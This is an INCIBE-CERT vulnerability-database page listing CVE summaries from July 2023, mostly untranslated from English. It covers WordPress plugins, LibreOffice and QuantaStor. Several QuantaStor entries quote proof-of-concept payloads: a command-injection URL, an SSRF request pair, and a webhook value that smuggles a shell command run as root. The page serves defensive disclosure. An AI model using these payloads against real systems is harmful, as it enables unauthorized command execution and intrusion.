Instituto Nacional de ciberseguridad. Sección Incibe
Instituto Nacional de Ciberseguridad. Sección INCIBE-CERT

Vulnerabilidades

Con el objetivo de informar, advertir y ayudar a los profesionales sobre las ultimas vulnerabilidades de seguridad en sistemas tecnológicos, ponemos a disposición de los usuarios interesados en esta información una base de datos con información en castellano sobre cada una de las ultimas vulnerabilidades documentadas y conocidas.

Este repositorio con más de 75.000 registros esta basado en la información de NVD (National Vulnerability Database) – en función de un acuerdo de colaboración – por el cual desde INCIBE realizamos la traducción al castellano de la información incluida. En ocasiones este listado mostrará vulnerabilidades que aún no han sido traducidas debido a que se recogen en el transcurso del tiempo en el que el equipo de INCIBE realiza el proceso de traducción.

Se emplea el estándar de nomenclatura de vulnerabilidades CVE (Common Vulnerabilities and Exposures), con el fin de facilitar el intercambio de información entre diferentes bases de datos y herramientas. Cada una de las vulnerabilidades recogidas enlaza a diversas fuentes de información así como a parches disponibles o soluciones aportadas por los fabricantes y desarrolladores. Es posible realizar búsquedas avanzadas teniendo la opción de seleccionar diferentes criterios como el tipo de vulnerabilidad, fabricante, tipo de impacto entre otros, con el fin de acortar los resultados.

Mediante suscripción RSS o Boletines podemos estar informados diariamente de las ultimas vulnerabilidades incorporadas al repositorio.

CVE-2023-1597

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** The tagDiv Cloud Library WordPress plugin before 2.7 does not have authorisation and CSRF in an AJAX action accessible to both unauthenticated and authenticated users, allowing unauthenticated users to change arbitrary user metadata, which could lead to privilege escalation by setting themselves as an admin of the blog.
Gravedad CVSS v3.1: ALTA
Última modificación:
07/11/2023

CVE-2023-1183

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** A flaw was found in the Libreoffice package. An attacker can craft an odb containing a "database/script" file with a SCRIPT command where the contents of the file could be written to a new file whose location was determined by the attacker.
Gravedad CVSS v3.1: MEDIA
Última modificación:
03/01/2024

CVE-2023-1780

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** The Companion Sitemap Generator WordPress plugin before 4.5.3 does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
Gravedad CVSS v3.1: MEDIA
Última modificación:
07/11/2023

CVE-2023-0359

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** A missing nullptr-check in handle_ra_input can cause a nullptr-deref.
Gravedad CVSS v3.1: ALTA
Última modificación:
13/07/2023

CVE-2023-1208

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** This HTTP Headers WordPress plugin before 1.18.11 allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.
Gravedad CVSS v3.1: ALTA
Última modificación:
07/11/2023

CVE-2023-1119

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** The WP-Optimize WordPress plugin before 3.2.13, SrbTransLatin WordPress plugin before 2.4.1 use a third-party library that removes the escaping on some HTML characters, leading to a cross-site scripting vulnerability.
Gravedad CVSS v3.1: MEDIA
Última modificación:
06/01/2025

CVE-2021-42081

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.<br /> <br /> POC<br /> http:///qstorapi/storageSystemModify?storageSystem=&amp;newName=quantastor&amp;newDescription=;ls${IFS}-al&amp;newLocation=4&amp;newEnclosureLayoutId=5&amp;newDnsServerList=;ls${IFS}-al&amp;externalHostName=&amp;newNTPServerList=;ls${IFS}-al
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
22/09/2025

CVE-2021-42080

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** An attacker is able to launch a Reflected XSS attack using a crafted URL.<br /> <br /> POC:<br /> <br /> Visit the following URL<br /> https://:8153/qstorapi/echo?inputMessage=
Gravedad CVSS v3.1: ALTA
Última modificación:
22/09/2025

CVE-2021-42079

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.<br /> <br /> POC<br /> <br /> Step 1: Prepare the SSRF with a request like this:<br /> <br /> GET /qstorapi/alertConfigSet?senderEmailAddress=a&amp;smtpServerIpAddress=BURPCOLLABHOST&amp;smtpServerPort=25&amp;smtpUsername=a&amp;smtpPassword=1&amp;smtpAuthType=1&amp;customerSupportEmailAddress=1&amp;poolFreeSpaceWarningThreshold=1&amp;poolFreeSpaceAlertThreshold=1&amp;poolFreeSpaceCriticalAlertThreshold=1&amp;pagerDutyServiceKey=1&amp;slackWebhookUrl=http://&amp;enableAlertTypes&amp;enableAlertTypes=1&amp;disableAlertTypes=1&amp;pauseAlertTypes=1&amp;mattermostWebhookUrl=http://<br /> HTTP/1.1<br /> <br /> Host: <br /> Accept-Encoding: gzip, deflate<br /> <br /> Accept: */*<br /> Accept-Language: en<br /> <br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br /> <br /> Connection: close<br /> <br /> authorization: Basic <br /> Content-Type: application/json<br /> <br /> Content-Length: 0<br /> <br /> Step 2: Trigger this alert with this request<br /> <br /> GET /qstorapi/alertRaise?title=test&amp;message=test&amp;severity=1 <br /> HTTP/1.1<br /> <br /> Host: <br /> Accept-Encoding: gzip, deflate<br /> <br /> Accept: */*<br /> <br /> Accept-Language: en<br /> <br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36<br /> <br /> Connection: close<br /> <br /> authorization: Basic <br /> Content-Type: application/json<br /> <br /> Content-Length: 1<br /> <br /> The post request received by looks like this:<br /> {<br />  <br /> ### Python FLASK stuff ####<br /> <br />  &amp;#39;endpoint&amp;#39;: &amp;#39;index&amp;#39;, <br />  <br /> &amp;#39;method&amp;#39;: &amp;#39;POST&amp;#39;, <br />  <br /> &amp;#39;cookies&amp;#39;: ImmutableMultiDict([]), <br />  <br /> ### END Python FLASK stuff ####<br /> <br />  <br /> &amp;#39;data&amp;#39;: b&amp;#39;{ <br />   "attachments": [ <br />    {<br /> <br />     "fallback": "[122] test / test.",<br /> <br />     "color": "#aa2222",<br /> <br />     "title": "[122] test",<br /> <br />     "text": "test",<br /> <br />     "fields": [   <br />      {    <br /> <br />       "title": "Alert Severity",<br />    <br />       "value": "CRITICAL",<br />    <br />       "short": false  <br />      },  {   <br />       "title": "Appliance",     <br />       "value": "quantastor (https://)",<br />     <br />       "short": true  <br /> <br />      },  {    <br /> <br />       "title": "System / Driver / Kernel Ver",    <br /> <br />       "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic",    <br /> <br />       "short": false  <br /> <br />      },  {    <br /> <br />       "title": "System Startup",    <br /> <br />       "value": "Fri Aug  6 16-02-55 2021",    <br /> <br />       "short": true  <br /> <br />       },  {    <br /> <br />       "title": "SSID",    <br /> <br />       "value": "f4823762-1dd1-1333-47a0-6238c474a7e7",    <br /> <br />       "short": true  <br /> <br />      },<br />     ],<br /> <br />     "footer": "QuantaStor Call-home Alert",<br /> <br />     "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ",<br /> <br />     "ts": 1628461774<br />    }<br />   ], <br />   "mrkdwn":true <br />  }&amp;#39;, <br />  #### FLASK REQUEST STUFF #####<br /> <br />  &amp;#39;headers&amp;#39;: {<br /> <br />   &amp;#39;Host&amp;#39;: &amp;#39;&amp;#39;, <br />   &amp;#39;User-Agent&amp;#39;: &amp;#39;curl/7.58.0&amp;#39;, <br />   &amp;#39;Accept&amp;#39;: &amp;#39;*/*&amp;#39;, <br />   &amp;#39;Content-Type&amp;#39;: &amp;#39;application/json&amp;#39;, <br />   &amp;#39;Content-Length&amp;#39;: &amp;#39;790&amp;#39;<br /> <br />  }, <br />  &amp;#39;args&amp;#39;: ImmutableMultiDict([]), <br />  &amp;#39;form&amp;#39;: ImmutableMultiDict([]), <br />  &amp;#39;remote_addr&amp;#39;: &amp;#39;217.103.63.173&amp;#39;, <br />  &amp;#39;path&amp;#39;: &amp;#39;/payload/58&amp;#39;, <br />  &amp;#39;whois_ip&amp;#39;: &amp;#39;TNF-AS, NL&amp;#39;<br /> }<br /> <br /> #### END FLASK REQUEST STUFF #####
Gravedad CVSS v3.1: MEDIA
Última modificación:
22/09/2025

CVE-2021-4406

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** An authenticated attacker is able to create alerts that trigger a stored XSS attack.<br /> <br /> POC<br /> <br /> <br /> * go to the alert manager<br /> <br /> <br /> * open the ITSM tab<br /> * add a webhook with the URL/service token value <br /> <br /> &amp;#39; -h &amp;&amp; id | tee /tmp/ttttttddddssss #&amp;#39; (whitespaces are tab characters)<br /> <br /> <br /> * click add<br /> <br /> <br /> * click apply<br /> <br /> <br /> * create a test alert<br /> <br /> <br /> * The test alert will run the command <br /> <br /> “id | tee /tmp/ttttttddddssss” as root.<br /> <br /> <br /> * after the test alert inspect <br /> <br /> /tmp/ttttttddddssss it&amp;#39;ll contain the ids of the root user.
Gravedad CVSS v3.1: CRÍTICA
Última modificación:
24/09/2025

CVE-2015-10119

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** A vulnerability, which was classified as problematic, has been found in View All Posts Page Plugin up to 0.9.0 on WordPress. This issue affects the function action_admin_notices_activation of the file view-all-posts-pages.php. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 0.9.1 is able to address this issue. The patch is named bf914f3a59063fa4df8fd4925ae18a5d852396d7. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-233363.
Gravedad CVSS v3.1: MEDIA
Última modificación:
17/05/2024

CVE-2021-42083

Fecha de publicación:
10/07/2023
Idioma:
Inglés
*** Pendiente de traducción *** An authenticated attacker is able to create alerts that trigger a stored XSS attack.<br /> <br /> POC<br /> <br /> <br /> * go to the alert manager<br /> <br /> <br /> * open the ITSM tab<br /> * add a webhook with the URL/service token value <br /> <br /> &amp;#39; -h &amp;&amp; id | tee /tmp/ttttttddddssss #&amp;#39; (whitespaces are tab characters)<br /> <br /> <br /> * click add<br /> <br /> <br /> * click apply<br /> <br /> <br /> * create a test alert<br /> <br /> <br /> * The test alert will run the command <br /> <br /> “id | tee /tmp/ttttttddddssss” as root.<br /> <br /> <br /> * after the test alert inspect <br /> <br /> /tmp/ttttttddddssss it&amp;#39;ll contain the ids of the root user.
Gravedad CVSS v3.1: ALTA
Última modificación:
22/09/2025